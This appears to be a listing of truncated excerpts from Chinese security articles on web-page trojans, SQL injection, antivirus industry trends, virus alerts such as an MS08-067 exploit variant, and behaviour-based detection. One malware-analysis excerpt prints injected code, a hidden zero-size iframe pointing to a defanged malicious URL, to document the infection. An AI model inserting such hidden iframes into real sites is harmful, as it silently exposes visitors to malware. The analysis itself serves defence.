WEB应用的发展，使网站产生越来越重要的作用，而越来越多的网站在此过程中也因为存在安全隐患而遭受到各种攻击，例如网页被挂马、网站SQL注入，导致网页被篡改、网站被查封，甚至被利用成为传播木马给浏览网站用户的一个载体。在那些黑客的眼里，网站并非是一个提供互联网服务和信息交流的平台，反而成为可以被低成本利用获取价值的一个途径。我们看看当前网站安全状况，数字的增长速度令人震惊。具不完全统计，

作为一个反病毒产业的“老兵”，我不得不坦诚地说，近几年防病毒产业的发展并不像很多人所宣称的那样乐观。据统计，现在全球新病毒的数量超过了1100万种，而且仍在快速增长。反病毒厂商的反应速度，已经被病毒制造者远远地抛在了后面。究其根本原因，我认为是由于反病毒产业近几年的疏于防范，没有实施足够的创新举措来应对这种现状。     

12月1日热门病毒：“POPHOT点击器变种EHI（Trojan.Clicker.Win32.PopHot.ehi）”病毒：警惕程度★★★，木马病毒，通过网络传播，依赖系统：Windows NT/2000/XP/2003。这是一个木马病毒。病毒运行后会将自身复制到系统目录下，并释放多个病毒文件。并且，病毒会注入到系统正常进程，试图关闭多种主流杀毒软件和安全工具，以及把自身添

 1.     概述网页挂马这个话题想来大家并不陌生。为什么有这么多的网页上存在着木马去攻击普通用户？不可否认，相当一部分网页原本就是恶意的：网页的作者故意在上面放上木马，然后通过各种手段引诱用户去浏览。但是绝大多数被挂马的网页原本是正常的网页，例如普通的教育网站，购物网站等等，只是网页被攻击者恶意修改后插入了木马代码。那么，攻击者是如何能够恶意修

 特别提示：读者如果亲自进行此实验操作，请务必事先安装“虚拟机”系统，并在“虚拟机”环境下进行实验，同时保证所有的网络连接处于“关闭”状态。（关于“虚拟机”的相关知识，详见本书第三篇第16章第1节“神奇的虚拟机”）蠕虫病毒是目前最为流行和破坏性最强的一类病毒。为了更好地

 endurer　原创2008-02-26　第1版该病毒会向所网页加入代码：/---＜iframe src=hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM width=0 height=0＞＜/iframe＞---/1 hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM包含代码：/---＜iframe src=

 The reason I talk about security我讨论安全的原因Author: Chad Perrin作者：Chad Perrin翻译：endurer，2008-07-20 第1版Category: Security类别：安全Tags: Security, Chad Perrin标签：安全，Chad Perrin英文出处：http://blogs.techrepubli

 Behavior-based AV solutions cannot stand alone基于行为的反病毒解决方案未能独挡一面Author: Tom Olzak作者：Tom Olzak翻译：endurer，2008-08-09 第1版Category: Security, Virus, Threats, Intrusion Detection, Antivirus, Spyware,

 据瑞星全球反病毒监测网介绍，今日(2008年11月10日)有一个病毒特别值得注意，它是：“MS08-067漏洞病毒变种B(Hack.Exploit.Win32.MS08-067.b)”病毒。这是利用微软 MS08-067 漏洞发起攻击的黑客程序，攻击成功后，会下载一个木马病毒，病毒会利用360安全卫士的驱动强制删除多个文件，导致主流安全软件失效，对广大用户的电脑

 主动防御貌似已经被炒的够热，因为以病毒为主要攻击方式的网络安全事件层出不穷，反病毒软件多数情况下对新出现的病毒没有识别能力，也就不能很好地起到拦截作用。这种情况持续了很多年，随着病毒的变化越来越多，病毒产业链的活动越来越猖獗，这个现象变得更严重了，由此引发了用户对杀毒软件的不信任。

为了解决这些日益严重的新威胁，杀毒厂商实际在分两个方向同时启步。一方面是采用传统的特征识别、加强引擎脱壳、加强样本的收集、加快病毒特征的更新等等。时至今日，这仍然是最主要的，效率最高的应对方法。但是，不可避免，会有电脑中招倒下，成为新病毒的牺牲品。另一方面，就是开发新的病毒识别技术。比如行为识别、注册表保护、应用程序保护等等。